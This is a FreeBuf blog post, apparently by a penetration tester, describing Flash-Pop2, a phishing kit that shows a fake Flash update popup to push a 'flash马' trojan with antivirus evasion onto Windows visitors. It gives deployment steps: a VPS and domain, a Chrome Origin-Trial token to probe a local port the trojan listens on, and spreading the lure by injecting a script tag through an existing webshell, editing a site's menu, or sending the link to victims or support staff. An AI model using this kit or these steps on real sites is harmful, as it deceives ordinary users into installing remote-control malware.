freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

flash钓鱼大法升级
jerrybird 2021-11-07 18:57:47 276278

项目地址:https://github.com/chroblert/Flash-Pop2
本项目基于https://github.com/r00tSe7en/Flash-Pop进行改造

0x01 目标

页面展示:

flash页面目标:

  1. flash页面能够判断当前系统是否已被安装flash马

  2. flash页面能够判断当前系统是否是Windows,若不是则跳转到正常或指定页面

  3. flash安装完成后需能跳转到正常或指定页面

flash马目标

  1. flash马能够起一个本地服务

  2. flash马能够免杀

  3. flash马能够捆绑或释放正常flash安装文件

过程:

  1. 首先判断系统是否为Windows,若不是则显示正常页面或指定页面;

  2. 若是Windows,则请求本地1341端口,判断当前机器是否已被控制。

    • 若已被控制,则显示正常页面或跳转到指定页面

    • 若未被控制,则弹窗显示flash升级页面

  3. 等待用户点击”立即升级“按钮

  4. 用户点击后,js开始每10秒判断一次是否成功执行了程序;

    • 若已执行,则跳转到正常页面或指定页面

    • 若未执行,则停留在flash弹窗页面

应用场景(a_type):

  1. 已有webshell,可以修改源码,

    • 在目标网站的页面源码中直接插入js:已安装flash的情况下,不做任何操作;未安装flash,弹出flash页面,定时检测,安装完成后,页面刷新 [0]

  2. 没有webshell,可以修改目标网站的导航菜单:

    • 添加自己的flash页面,供受害者点击;

    • 如果设置了特定页面,则当安装完成后,则跳转到指定页面;

    • 若未设置,则跳转到document.referrer(如果其不包含js中设置的域名)[1]

  3. 直接发送给对方

    • 对方直接在浏览器中输入flash地址:如果安装完成后,则直接跳转到指定页面;[2]

0x02 使用

(一) 条件:

  1. 一台vps

  2. 一个域名

  3. 谷歌账号

(二) 步骤:

配置网站

这里推荐宝塔,太方便了

  1. 安装宝塔

  2. 创建网站

    • 在购买域名的地方,添加dns解析到服务器IP

    • 在宝塔网站->设置->一键配置ssl

  3. 下载flash页面并上传到宝塔创建的网站目录下面

    • flash项目地址:https://github.com/chroblert/Flash-Pop2

  4. 申请Origin-Trial

    • 访问https://developer.chrome.com/origintrials/#/trials/active

    • 选择并注册Private Network Access from non-secure contexts

    • 填写信息并注册

    • 注册成功后会返回一些信息

    • 一个token值,该值在2021年12月31日前有效,之后就需要重新申请

  5. 宝塔网站配置Origin-Trial响应头

    • 在网站->设置->配置文件中添加

    • add_header Origin-Trial <上步中的token值>

    • 添加成功后,响应应该如下

设置flash参数

  1. 下载flash-pop2项目后,进入js文件夹下修改flash.js文件中的参数

  2. 配置说明

    • ttarget: 宝塔网站设置的域名

    • target_file: flash马的下载地址

    • bc_link: 要跳转到的指定页面

    • pb_word: 如上图

    • l_url: flash马在本地监听的http服务

    • l_res: flash马在本地监听的http服务返回的响应

    • a_type: 应用场景

  3. flash马

    • flash马中应该起一个http服务,并返回设置的l_res内容

    • flash马中的http服务应该返回一个用于解决跨域问题的响应头 Access-Control-Allow-Origin: *

    • 示例如下:

应用

  1. 已有webshell,可以修改网站源代码

    • 修改网站源码,添加<script src=//flash-pop2-domain.com/js/flash.js></script>

    • 这里目标网站用什么,这里就填什么。如果目标网站是http,这里却是https,那么chrome会出现cors问题,firefox没这个问题…

  2. 没有webshell,可以修改网站菜单

    • 添加或修改菜单链接为https://flash-pop2-domain.com/index.html

  3. 直接发送给客服或者受害者

    • 将https://flash-pop2-domain.com/index.html直接发送给对方

参考资料:XHR

参考资料:原生js dom操作汇总

参考资料:山寨“特x版”flash

参考资料:检测与隐藏CS服务器

参考资料:CF源IP问题

参考资料:http 远程站点请求 ip 地址报 CORS 错误

参考资料:CDN添加自定义响应头

参考资料:cf使用worker添加响应头

参考资料:一个大坑-请求报错会导致window.onload无法执行

参考资料:资源加载:onload,onerror

# 渗透测试 # flash钓鱼
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 jerrybird 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Zer0ne安全研究
metasploit技术
jerrybird LV.4
欢迎关注微信公众号:JC_SecNotes(Zer0ne安全研究)
  • 15 文章数
  • 30 关注者
IDEA动态调试WebLogic
2023-07-08
Windows全局代理
2022-05-27
工具|Windows令牌查看与利用工具
2021-05-23
文章目录